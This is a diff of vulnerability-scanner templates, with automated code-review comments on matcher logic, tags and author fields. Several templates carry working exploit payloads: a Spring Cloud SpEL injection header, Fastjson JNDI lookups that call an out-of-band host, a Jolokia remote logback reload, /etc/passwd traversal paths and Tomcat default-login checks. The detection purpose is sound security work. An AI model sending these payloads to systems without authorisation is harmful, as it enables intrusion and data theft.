"rememberMe=deleteMe" 
diff --git a/poc/java/springForShell-CVE-2022-22963.yaml b/poc/java/springForShell-CVE-2022-22963.yaml
index f28360d6a7..0df514805b 100644
--- a/poc/java/springForShell-CVE-2022-22963.yaml
+++ b/poc/java/springForShell-CVE-2022-22963.yaml
@@ -1,44 +1,49 @@ id: CVE-2022-22963 info: - name: CVE-2022-22963 - Spring Cloud RCE - author: rdnt + name: Spring Cloud - Remote Code Execution + author: Mr-xn,Adam Crosser severity: critical - description: RCE on Spring cloud function SPEL - tags: cve,rce,spring,cve2022,injection + description: | + Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions are susceptible to remote code execution vulnerabilities. When using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources. + reference: + - https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f + - https://github.com/cckuailong/spring-cloud-function-SpEL-RCE + - https://tanzu.vmware.com/security/cve-2022-22963 + - https://nsfocusglobal.com/spring-cloud-function-spel-expression-injection-vulnerability-alert/ + - https://github.com/vulhub/vulhub/tree/scf-spel/spring/spring-cloud-function-spel-injection + - https://nvd.nist.gov/vuln/detail/CVE-2022-22963 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-22963 - cwe-id: CWE-770 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-22963 + cwe-id: CWE-94 + epss-score: 0.97501 + tags: vulhub,cve,cve2022,springcloud,rce,kev + metadata: + max-request: 1 -requests: - - method: POST - path: - - "{{RootURL}}/functionRouter" - - "{{RootURL}}/api/functionRouter" - - "{{RootURL}}/api/v1/functionRouter" - - "{{RootURL}}/../../../../../../functionRouter" - - "{{RootURL}}/../../../../../../;functionRouter" - - "{{RootURL}}/spring/functionRouter" - - "{{RootURL}}/admin/functionRouter" - - "{{RootURL}}/../../../../../../../../functionRouter" - - "{{RootURL}}../../../../../../../../api/functionRouter" - - "{{RootURL}}../../../../../../../../api/v1/functionRouter" - - 
"{{RootURL}}%2f%2e%2e%2f%2e%2e%2ffunctionRouter" - - "{{RootURL}}%2fspring%2ffunctionRouter" - - "{{RootURL}}%2fadmin%2functionRouter" - headers: - spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("") - Content-Type: application/x-www-form-urlencoded - body: exp +http: + - raw: + - | + POST /functionRouter HTTP/1.1 + Host: {{Hostname}} + spring.cloud.function.routing-expression: T(java.net.InetAddress).getByName("{{interactsh-url}}") + Content-Type: application/x-www-form-urlencoded + + {{rand_base(8)}} matchers-condition: and matchers: - - type: word - part: body - words: - - 'functionRouter' - - type: status - status: - - 500 \ No newline at end of file + - type: word + part: interactsh_protocol + words: + - "http" + - "dns" + condition: or + + - type: status + status: + - 500 + +# Enhanced by mp on 2022/05/19 diff --git a/poc/java/springboot-actuators-jolokia-xxe.yaml b/poc/java/springboot-actuators-jolokia-xxe.yaml index 31723c324d..8d86dd794f 100644 --- a/poc/java/springboot-actuators-jolokia-xxe.yaml +++ b/poc/java/springboot-actuators-jolokia-xxe.yaml 
@@ -2,27 +2,30 @@ id: springboot-actuators-jolokia-xxe info: name: Spring Boot Actuators (Jolokia) XXE - author: dwisiswant0 + author: dwisiswant0,ipanda severity: high + description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to perform an XML External Entities (XXE) attack and include content stored on a remote server as if it was its own. This has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine. + reference: + - https://www.veracode.com/blog/research/exploiting-spring-boot-actuators + - https://github.com/mpgn/Spring-Boot-Actuator-Exploit + tags: springboot,jolokia,xxe requests: - method: GET path: - - "{{BaseURL}}:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml" - "{{BaseURL}}/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml" + - "{{BaseURL}}/actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml" + matchers-condition: and matchers: - type: status status: - 200 + - type: word + part: body words: - "http:\\/\\/nonexistent:31337\\/logback.xml" - "reloadByURL" - "JoranException" - condition: and - part: body - - type: word - words: - - "X-Application-Context" - part: header \ No newline at end of file + condition: and \ No newline at end of file diff --git a/poc/java/springboot-dump.yaml b/poc/java/springboot-dump.yaml index 6002fe9b4a..0e9e254e73 100644 --- a/poc/java/springboot-dump.yaml +++ b/poc/java/springboot-dump.yaml @@ -10,6 +10,7 @@ requests: path: - "{{BaseURL}}/dump" - "{{BaseURL}}/actuator/dump" + stop-at-first-match: true matchers-condition: and matchers: - type: word 
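Review bot: The second entry added under `path:` asks Jolokia to reload from `http:!/!/random:915!/logback.xml`, but the body matcher still requires the literal `http:\\/\\/nonexistent:31337\\/logback.xml` together with `reloadByURL` and `JoranException` under `condition: and`. Assuming the error body echoes the URL that was requested, the `/actuator/jolokia` request can never satisfy that matcher, so deployments exposing Jolokia only under `/actuator` go unreported. Use the same placeholder host and port in both paths (end the new path with `http:!/!/nonexistent:31337!/logback.xml`), or match only on `reloadByURL` and `JoranException`. The hunk also removes the `X-Application-Context` header matcher, which leaves the body words as the only discriminator besides the status.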
diff --git a/poc/java/springboot-heapdump-10463.yaml b/poc/java/springboot-heapdump-10463.yaml index c84da82205..891314043a 100644 --- a/poc/java/springboot-heapdump-10463.yaml +++ b/poc/java/springboot-heapdump-10463.yaml @@ -1,11 +1,9 @@ id: springboot-heapdump info: - name: Spring Boot Actuator - Heap Dump Detection + name: Detect Springboot Heapdump Actuator author: that_juan_,dwisiswant0,wdahlenb severity: critical - description: A Spring Boot Actuator heap dump was detected. A heap dump is a snapshot of JVM memory, which could expose environment variables and HTTP requests. - reference: - - https://github.com/pyn3rd/Spring-Boot-Vulnerability + description: Environment variables and HTTP requests can be found in the HPROF tags: springboot,exposure requests: - method: GET @@ -25,5 +23,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/05/20 diff --git a/poc/java/springboot-info.yaml b/poc/java/springboot-info.yaml index e34a0d7d2f..899a74d592 100644 --- a/poc/java/springboot-info.yaml +++ b/poc/java/springboot-info.yaml @@ -10,6 +10,7 @@ requests: path: - "{{BaseURL}}/info" - "{{BaseURL}}/actuator/info" + stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -18,14 +19,14 @@ requests: - '"build"' - '"artifact"' condition: and - - type: status - status: - - 200 - type: word + part: header words: - "application/json" - "application/vnd.spring-boot.actuator" - "application/vnd.spring-boot.actuator.v2+json" - "application/vnd.spring-boot.actuator.v1+json" condition: or - part: header + - type: status + status: + - 200 diff --git a/poc/java/springboot-log4j-rce.yaml b/poc/java/springboot-log4j-rce.yaml index 28f847f7e4..4286931f8d 100644 --- a/poc/java/springboot-log4j-rce.yaml +++ b/poc/java/springboot-log4j-rce.yaml 
@@ -1,10 +1,9 @@ id: springboot-log4j-rce info: - name: Spring Boot - Remote Code Execution (Apache Log4j) + name: Spring Boot Log4j Remote Code Injection author: pdteam severity: critical - description: Spring Boot is susceptible to remote code execution via Apache Log4j. reference: - https://logging.apache.org/log4j/2.x/security.html - https://www.lunasec.io/docs/blog/log4j-zero-day/ @@ -45,6 +44,4 @@ requests: part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output - -# Enhanced by mp on 2022/05/31 + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output \ No newline at end of file diff --git a/poc/java/springboot-loggers-10475.yaml b/poc/java/springboot-loggers-10475.yaml index b5e9d66968..4612e17e0c 100644 --- a/poc/java/springboot-loggers-10475.yaml +++ b/poc/java/springboot-loggers-10475.yaml @@ -1,14 +1,20 @@ id: springboot-loggers + info: name: Detect Springboot Loggers author: that_juan_,dwisiswant0,wdahlenb severity: low tags: springboot,exposure -requests: + metadata: + max-request: 2 + +http: - method: GET path: - "{{BaseURL}}/loggers" - "{{BaseURL}}/actuator/loggers" + + stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -17,13 +23,15 @@ requests: - '"loggers"' - '"levels"' condition: and - - type: status - status: - - 200 + - type: word + part: header words: - "application/json" - "application/vnd.spring-boot.actuator" - "application/vnd.spring-boot.actuator.v1+json" condition: or - part: header + + - type: status + status: + - 200 diff --git a/poc/java/springboot-mappings.yaml b/poc/java/springboot-mappings.yaml index d9abf6d280..47604c0cef 100644 --- a/poc/java/springboot-mappings.yaml +++ b/poc/java/springboot-mappings.yaml 
@@ -1,10 +1,10 @@ id: springboot-mappings info: name: Detect Springboot Mappings Actuator - author: that_juan_,dwisiswant0,wdahlenb + author: that_juan_ & dwisiswant0 & wdahlenb severity: low description: Additional routes may be displayed - tags: springboot,exposure + tags: springboot,disclosure requests: - method: GET path: diff --git a/poc/java/springboot-threaddump-10484.yaml b/poc/java/springboot-threaddump-10484.yaml index edf5e05d68..1e9c7022de 100644 --- a/poc/java/springboot-threaddump-10484.yaml +++ b/poc/java/springboot-threaddump-10484.yaml @@ -1,5 +1,4 @@ id: springboot-threaddump - info: name: Detect Springboot Thread Dump page author: philippedelteil @@ -8,15 +7,11 @@ info: reference: - https://docs.spring.io/spring-boot/docs/2.4.11-SNAPSHOT/actuator-api/htmlsingle/#threaddump tags: springboot - metadata: - max-request: 2 - -http: +requests: - method: GET path: - "{{BaseURL}}/threaddump" - "{{BaseURL}}/actuator/threaddump" - stop-at-first-match: true matchers-condition: and matchers: @@ -26,7 +21,6 @@ http: - '"threads":' - '"threadName":' condition: and - - type: word part: header words: @@ -35,7 +29,6 @@ http: - "application/vnd.spring-boot.actuator.v2+json" - "application/vnd.spring-boot.actuator.v1+json" condition: or - - type: status status: - 200 diff --git a/poc/java/springboot-trace-10492.yaml b/poc/java/springboot-trace-10492.yaml index 31cf2cb63e..b967e514f2 100644 --- a/poc/java/springboot-trace-10492.yaml +++ b/poc/java/springboot-trace-10492.yaml @@ -1,19 +1,14 @@ id: springboot-trace - info: name: Detect Springboot Trace Actuator author: that_juan_,dwisiswant0,wdahlenb severity: low description: View recent HTTP requests and responses tags: misconfig,springboot,exposure - metadata: - max-request: 1 - -http: +requests: - method: GET path: - "{{BaseURL}}/trace" - matchers-condition: and matchers: - type: word @@ -24,7 +19,6 @@ http: - '"method"' - '"path"' condition: and - - type: word part: header words: 
@@ -32,7 +26,6 @@ http: - "application/vnd.spring-boot.actuator" - "application/vnd.spring-boot.actuator.v1+json" condition: or - - type: status status: - 200 diff --git a/poc/java/tomcat-default-login.yaml b/poc/java/tomcat-default-login.yaml index 071367c987..4e522c9229 100644 --- a/poc/java/tomcat-default-login.yaml +++ b/poc/java/tomcat-default-login.yaml @@ -2,8 +2,8 @@ id: tomcat-default-login info: name: ApahceTomcat Manager Default Login author: pdteam - description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations. severity: high + description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations. reference: - https://www.rapid7.com/db/vulnerabilities/apache-tomcat-default-ovwebusr-password/ tags: tomcat,apache,default-login @@ -55,11 +55,15 @@ requests: attack: pitchfork # Available options: sniper, pitchfork and clusterbomb matchers-condition: and matchers: + - type: word + part: body + words: + - "Apache Tomcat" + - "Server Information" + - "Hostname" + condition: and - type: status status: - 200 - - type: word - words: - - Apache Tomcat # Enhanced by mp on 2022/03/03 diff --git a/poc/java/tomcat-scripts-10802.yaml b/poc/java/tomcat-scripts-10802.yaml index 16226c2852..268fc0b6a8 100644 --- a/poc/java/tomcat-scripts-10802.yaml +++ b/poc/java/tomcat-scripts-10802.yaml @@ -1,11 +1,9 @@ id: tomcat-scripts - info: name: Detect Tomcat Exposed Scripts author: Co0nan severity: info tags: apache - requests: - method: GET path: diff --git a/poc/java/weblogic-detect-11144.yaml b/poc/java/weblogic-detect-11144.yaml index 23f46a01a8..d50d670388 100644 --- a/poc/java/weblogic-detect-11144.yaml +++ b/poc/java/weblogic-detect-11144.yaml 
@@ -1,22 +1,13 @@ id: weblogic-detect info: name: Detect Weblogic - author: pdteam + author: bing0o severity: info - tags: tech,weblogic - metadata: - shodan-query: product:"Oracle Weblogic" requests: - method: GET path: - - "{{BaseURL}}/{{randstr}}" - matchers-condition: and + - "{{BaseURL}}/console/login/LoginForm.jsp" matchers: - type: word words: - - "From RFC 2068" - - "Error 404--Not Found" - condition: and - - type: status - status: - - 404 + - "WebLogic" diff --git a/poc/javascript/Arcms-json_newslist-sqli.yaml b/poc/javascript/Arcms-json_newslist-sqli.yaml old mode 100755 new mode 100644 diff --git a/poc/javascript/BlueCMS_v1-adjs-sqli.yaml b/poc/javascript/BlueCMS_v1-adjs-sqli.yaml old mode 100755 new mode 100644 diff --git a/poc/javascript/aem-querybuilder-json-servlet-187.yaml b/poc/javascript/aem-querybuilder-json-servlet-187.yaml index 18210457c8..48870c0894 100644 --- a/poc/javascript/aem-querybuilder-json-servlet-187.yaml +++ b/poc/javascript/aem-querybuilder-json-servlet-187.yaml @@ -18,11 +18,6 @@ requests: status: - 200 - - type: word - words: - - "application/json" - part: header - - type: word words: - 'success' diff --git a/poc/javascript/bower-json.yaml b/poc/javascript/bower-json.yaml index 67f8c44101..8d59c7f9bb 100644 --- a/poc/javascript/bower-json.yaml +++ b/poc/javascript/bower-json.yaml @@ -4,7 +4,7 @@ info: name: bower.json file disclosure author: oppsec severity: info - description: Bower is a package manager which stores packages informations in bower.json file + description: Bower is a package manager which stores package information in the bower.json file tags: exposure requests: diff --git a/poc/javascript/fastjson-1-2-42-rce-7408.yaml b/poc/javascript/fastjson-1-2-42-rce-7408.yaml index 6067f012d4..c50092689f 100644 --- a/poc/javascript/fastjson-1-2-42-rce-7408.yaml +++ b/poc/javascript/fastjson-1-2-42-rce-7408.yaml 
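Review bot: The only matcher left in weblogic-detect-11144.yaml is the bare word `WebLogic`, with no `part` and no status check, so any response to `/console/login/LoginForm.jsp` that mentions the product name (an error page, a block page, a redirect body) is reported as a detection. Pin the word to the body and combine it with a status matcher, as sketched below, assuming the console serves the login form with a 200. The hunk also removes `tags: tech,weblogic` and the `metadata` block, so tag-filtered runs will skip the template; keeping the `tags` line costs nothing.

```yaml
  # … unchanged: method and path …
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "WebLogic"
      - type: status
        status:
          - 200
```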
@@ -1,16 +1,11 @@ id: fastjson-1-2-42-rce info: - name: Fastjson 1.2.42 - Remote Code Execution + name: Fastjson 1.2.42 Deserialization RCE author: zh severity: critical - description: Fastjson 1.2.42 is susceptible to a deserialization remote code execution vulnerability reference: - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson - https://github.com/wyzxxz/fastjson_rce_tool - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 tags: fastjson,rce,deserialization,oast requests: - raw: @@ -34,5 +29,3 @@ requests: negative: true status: - 200 - -# Enhanced by mp on 2022/05/25 diff --git a/poc/javascript/fastjson-1-2-47-rce.yaml b/poc/javascript/fastjson-1-2-47-rce.yaml index 2971ba72ad..0d9f24a329 100644 --- a/poc/javascript/fastjson-1-2-47-rce.yaml +++ b/poc/javascript/fastjson-1-2-47-rce.yaml @@ -1,18 +1,13 @@ id: fastjson-1-2-47-rce info: - name: Fastjson 1.2.47 - Remote Code Execution + name: Fastjson 1.2.47 Deserialization RCE author: zh severity: critical - description: Fastjson 1.2.47 is susceptible to a deserialization remote code execution vulnerability. reference: - https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce - https://www.freebuf.com/vuls/208339.html - https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955 - https://github.com/wyzxxz/fastjson_rce_tool - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 tags: fastjson,rce,deserialization,oast requests: - raw: @@ -43,5 +38,3 @@ requests: words: - "Bad Request" - "400" - -# Enhanced by mp on 2022/05/25 diff --git a/poc/javascript/fastjson-1-2-62-rce.yaml b/poc/javascript/fastjson-1-2-62-rce.yaml index 0b08215cde..7f16ccb998 100644 --- a/poc/javascript/fastjson-1-2-62-rce.yaml +++ b/poc/javascript/fastjson-1-2-62-rce.yaml 
@@ -1,17 +1,14 @@ id: fastjson-1-2-62-rce + info: - name: Fastjson 1.2.62 - Remote Code Execution + name: Fastjson 1.2.62 Deserialization RCE author: zh severity: critical - description: Fastjson 1.2.62 is susceptible to a deserialization remote code execution vulnerability. reference: - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson - https://github.com/wyzxxz/fastjson_rce_tool - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 tags: fastjson,rce,deserialization,oast + requests: - raw: - | @@ -23,15 +20,15 @@ requests: "@type":"org.apache.xbean.propertyeditor.JndiConverter", "AsText":"rmi://{{interactsh-url}}/exploit" } + matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms DNS Interaction + part: interactsh_protocol # Confirms DNS Interaction words: - "dns" + - type: status negative: true status: - - 200 - -# Enhanced by mp on 2022/05/25 + - 200 \ No newline at end of file diff --git a/poc/javascript/fastjson-1-2-67-rce-7424.yaml b/poc/javascript/fastjson-1-2-67-rce-7424.yaml index 9798de3adc..49fa7d3d12 100644 --- a/poc/javascript/fastjson-1-2-67-rce-7424.yaml +++ b/poc/javascript/fastjson-1-2-67-rce-7424.yaml @@ -1,22 +1,13 @@ id: fastjson-1-2-67-rce - info: - name: Fastjson 1.2.67 - Remote Code Execution + name: Fastjson 1.2.67 Deserialization RCE author: zh severity: critical - description: Fastjson 1.2.67 is susceptible to a remote code execution vulnerability. reference: - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson - https://github.com/wyzxxz/fastjson_rce_tool - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 tags: fastjson,rce,deserialization,oast - metadata: - max-request: 1 - -http: +requests: - raw: - | POST / HTTP/1.1 
@@ -30,17 +21,13 @@ http: "UserTransaction":"rmi://{{interactsh-url}}/Exploit" } } - matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms DNS Interaction + part: interactsh_protocol # Confirms DNS Interaction words: - "dns" - - type: status negative: true status: - 200 - -# Enhanced by mp on 2022/05/25 diff --git a/poc/javascript/fastjson1_2_47-rce-Deserialization.yaml b/poc/javascript/fastjson1_2_47-rce-Deserialization.yaml old mode 100755 new mode 100644 diff --git a/poc/javascript/js-version-jszip_3-1-3.yaml b/poc/javascript/js-version-jszip_3-1-3.yaml index c4cc7f44c5..ec962b6a01 100644 --- a/poc/javascript/js-version-jszip_3-1-3.yaml +++ b/poc/javascript/js-version-jszip_3-1-3.yaml @@ -17,7 +17,7 @@ info: - https://cwe.mitre.org/data/definitions/400.html - https://cwe.mitre.org/data/definitions/29.html - https://www.owasp.org/index.php/Fingerprint_Web_Server_(OTG-INFO-002) - tags: js,jszip,outdated,version + tags: js,jszip,outdated,version,howden,snykroweb classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L cvss-score: 7.3 diff --git a/poc/javascript/keycloak-json-8472.yaml b/poc/javascript/keycloak-json-8472.yaml index 20e0016894..6ab0d7f9bc 100644 --- a/poc/javascript/keycloak-json-8472.yaml +++ b/poc/javascript/keycloak-json-8472.yaml @@ -1,13 +1,18 @@ id: keycloak-json + info: - name: Keycloak Json File + name: Keycloak JSON File author: oppsec severity: info - tags: exposure -requests: + metadata: + max-request: 1 + tags: exposure,keycloak,config,files + +http: - method: GET path: - "{{BaseURL}}/keycloak.json" + matchers-condition: and matchers: - type: word @@ -16,6 +21,9 @@ requests: - resource - auth-server-url condition: and + - type: status status: - 200 + +# digest: 4b0a004830460221009acc353a326ecb9df8fae0ac2780849233f7b1bca07d6b306abbcaa25e8936e4022100e4b00ec3576fa8492000c405ad847e18296b91f3d3c6bec750fa928b434a18e7:922c64590222798bb761d5b6d8e72950 
diff --git a/poc/javascript/package-json-9421.yaml b/poc/javascript/package-json-9421.yaml index c397c41544..d2b07ab133 100644 --- a/poc/javascript/package-json-9421.yaml +++ b/poc/javascript/package-json-9421.yaml @@ -1,18 +1,15 @@ id: package-json - info: name: npm package.json disclosure - author: geeknik,afaq + author: geeknik & afaq severity: info description: All npm packages contain a file, usually in the project root, called package.json - this file holds various metadata relevant to the project. tags: config,exposure - requests: - method: GET path: - "{{BaseURL}}/package.json" - "{{BaseURL}}/package-lock.json" - matchers-condition: and matchers: - type: word @@ -20,12 +17,10 @@ requests: - "name" - "version" condition: and - - type: word words: - "application/json" part: header - - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/poc/jenkins/jenkins-detect.yaml b/poc/jenkins/jenkins-detect.yaml index 136d39862b..2991584dd5 100644 --- a/poc/jenkins/jenkins-detect.yaml +++ b/poc/jenkins/jenkins-detect.yaml @@ -1,5 +1,4 @@ id: jenkins-detect - info: name: Jenkins Detection author: philippdelteil,daffainfo,c-sh0 @@ -11,13 +10,11 @@ info: metadata: shodan-query: http.favicon.hash:81586312 tags: tech,jenkins - requests: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/whoAmI/" - redirects: true max-redirects: 2 stop-at-first-match: true @@ -28,11 +25,9 @@ requests: words: - "x-jenkins" case-insensitive: true - - type: word words: - "Jenkins" - extractors: - type: kval kval: diff --git a/poc/joomla/joomla-config-file.yaml b/poc/joomla/joomla-config-file.yaml index 04f75c426a..ce01415e5f 100644 --- a/poc/joomla/joomla-config-file.yaml +++ b/poc/joomla/joomla-config-file.yaml 
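Review bot: The `author` field in package-json-9421.yaml changes from the comma-separated `geeknik,afaq` to `geeknik & afaq`, which contradicts laravel-log-file-8597.yaml in this commit, where `sheikhrishad & geeknik` becomes `sheikhrishad,geeknik`. Anything that splits authors on commas would presumably read `geeknik & afaq` as a single name. I would keep `author: geeknik,afaq`; laravel-env-8583.yaml introduces the same `&` form and should get `author: pxmme1337,dwisiswant0,geeknik,emenalf`.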
@@ -1,11 +1,11 @@ id: joomla-config-dist-file info: - name: Joomla Config Dist File + name: Joomla! Config Dist File author: oppsec severity: low - description: configuration.php-dist is a file created by Joomla to save Joomla settings. - tags: config,exposure + description: configuration.php-dist is a file created by Joomla! to save Joomla settings. + tags: config,exposure,joomla requests: - method: GET diff --git a/poc/joomla/joomla-htaccess.yaml b/poc/joomla/joomla-htaccess.yaml index bf51cbfa49..a6ae5ce2b4 100644 --- a/poc/joomla/joomla-htaccess.yaml +++ b/poc/joomla/joomla-htaccess.yaml @@ -3,8 +3,8 @@ info: name: Joomla htaccess file disclosure author: oppsec severity: info - description: Joomla has an htaccess file to store configurations about HTTP config, directory listing, etc. - tags: misc,joomla + description: Joomla have a htaccess file to store some configuration about HTTP Config, Directory Listening etc... + tags: misc requests: - method: GET path: @@ -13,13 +13,13 @@ requests: matchers: - type: word words: - - "Joomla" + - "# @package Joomla" - "Open Source Matters. All rights reserved" condition: and - type: word - part: header words: - "text/plain" + part: header - type: status status: - 200 diff --git a/poc/kafka/kafka-consumer-monitor-8424.yaml b/poc/kafka/kafka-consumer-monitor-8424.yaml index 001c1d2f44..f038415448 100644 --- a/poc/kafka/kafka-consumer-monitor-8424.yaml +++ b/poc/kafka/kafka-consumer-monitor-8424.yaml @@ -4,9 +4,9 @@ info: name: Kafka Consumer Offset Monitor Exposure author: dhiyaneshDK severity: low + tags: panel,kafka metadata: shodan-query: http.title:"Kafka Consumer Offset Monitor" - tags: panel,kafka requests: - method: GET diff --git a/poc/laravel/laravel-debug-enabled-8574.yaml b/poc/laravel/laravel-debug-enabled-8574.yaml index d9a0151104..3613dbd615 100644 --- a/poc/laravel/laravel-debug-enabled-8574.yaml +++ b/poc/laravel/laravel-debug-enabled-8574.yaml 
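Review bot: The new `description` in joomla-htaccess.yaml says "Directory Listening", which should be "directory listing", and is less readable than the line it replaces. I would keep `description: Joomla has an htaccess file to store configurations about HTTP config, directory listing, etc.` The same hunk drops the `joomla` tag while joomla-config-file.yaml just above gains it, so a tag-based run of the Joomla checks would skip this template; `tags: misc,joomla` keeps the two consistent.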
@@ -1,29 +1,19 @@ id: laravel-debug-enabled - info: name: Laravel Debug Enabled author: notsoevilweasel + description: Laravel with APP_DEBUG set to true prone to showing verbose errors. severity: medium - description: | - Laravel with APP_DEBUG set to true is prone to show verbose errors. - remediation: | - Disable Laravel's debug mode by setting APP_DEBUG to false. tags: debug,laravel,misconfig - metadata: - max-request: 1 - -http: +requests: - method: GET path: - "{{BaseURL}}/_ignition/health-check" - matchers-condition: and matchers: - type: word - part: body words: - can_execute_commands - - type: status status: - 200 diff --git a/poc/laravel/laravel-env-8583.yaml b/poc/laravel/laravel-env-8583.yaml index 07f2a0adc9..aed619de53 100644 --- a/poc/laravel/laravel-env-8583.yaml +++ b/poc/laravel/laravel-env-8583.yaml @@ -1,8 +1,10 @@ id: laravel-env info: name: Laravel .env file accessible - author: d3sca + author: pxmme1337 & dwisiswant0 & geeknik & emenalf severity: critical + description: Laravel uses the .env file to store sensitive information like database credentials and tokens. It should not be publicly accessible. + reference: https://laravel.com/docs/master/configuration#environment-configuration tags: config,exposure requests: - method: GET diff --git a/poc/laravel/laravel-log-file-8597.yaml b/poc/laravel/laravel-log-file-8597.yaml index 5fada34f9b..9e81996767 100644 --- a/poc/laravel/laravel-log-file-8597.yaml +++ b/poc/laravel/laravel-log-file-8597.yaml 
@@ -1,15 +1,18 @@ id: laravel-log-file + info: name: Laravel log file publicly accessible - author: sheikhrishad & geeknik + author: sheikhrishad,geeknik severity: high description: The log file of this Laravel web app might reveal details on the inner workings of the app, possibly even tokens, credentials or personal information. reference: https://laravel.com/docs/master/logging tags: laravel,logs,exposure + requests: - method: GET path: - "{{BaseURL}}/storage/logs/laravel.log" + matchers-condition: and matchers: - type: word diff --git a/poc/local_file_inclusion/Karel-ip-phone-lfi.yaml b/poc/local_file_inclusion/Karel-ip-phone-lfi.yaml index cf9a777485..d7f751d79f 100644 --- a/poc/local_file_inclusion/Karel-ip-phone-lfi.yaml +++ b/poc/local_file_inclusion/Karel-ip-phone-lfi.yaml @@ -1,12 +1,16 @@ id: karel-ip-phone-lfi info: - name: Karel IP Phone IP1211 Web Management Panel - Directory Traversal + name: Karel IP Phone IP1211 Web Management Panel - Local File Inclusion author: 0x_Akoko severity: high - description: A vulnerability in the Karel IP Phone IP1211 Web Management Panel allows remote attackers to access arbitrary files stored on the remote device via the 'cgiServer.exx' endpoint and the 'page' parameter. + description: Karel IP Phone IP1211 Web Management Panel is vulnerable to local file inclusion and can allow remote attackers to access arbitrary files stored on the remote device via the 'cgiServer.exx' endpoint and the 'page' parameter. reference: - https://cxsecurity.com/issue/WLB-2020100038 - https://www.karel.com.tr/urun-cozum/ip1211-ip-telefon + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 tags: karel,lfi requests: - method: GET @@ -22,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/08/03 diff --git a/poc/local_file_inclusion/bems-api-lfi.yaml b/poc/local_file_inclusion/bems-api-lfi.yaml index f81f84cfeb..ffddda6590 100644 
--- a/poc/local_file_inclusion/bems-api-lfi.yaml +++ b/poc/local_file_inclusion/bems-api-lfi.yaml @@ -1,20 +1,24 @@ -id: bems-api-lfi -info: - name: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download - author: gy741 - severity: high - description: The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php - tags: lfi -requests: - - method: GET - path: - - "{{BaseURL}}/api/downloads?fileName=../../../../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0" - - type: status - status: - - 200 +id: bems-api-lfi + +info: + name: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download + author: gy741 + severity: high + description: The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. + reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php + tags: lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/api/downloads?fileName=../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/poc/local_file_inclusion/blue-ocean-excellence-lfi-758.yaml b/poc/local_file_inclusion/blue-ocean-excellence-lfi-758.yaml index ea7b52af00..aaf580687c 100644 --- a/poc/local_file_inclusion/blue-ocean-excellence-lfi-758.yaml 
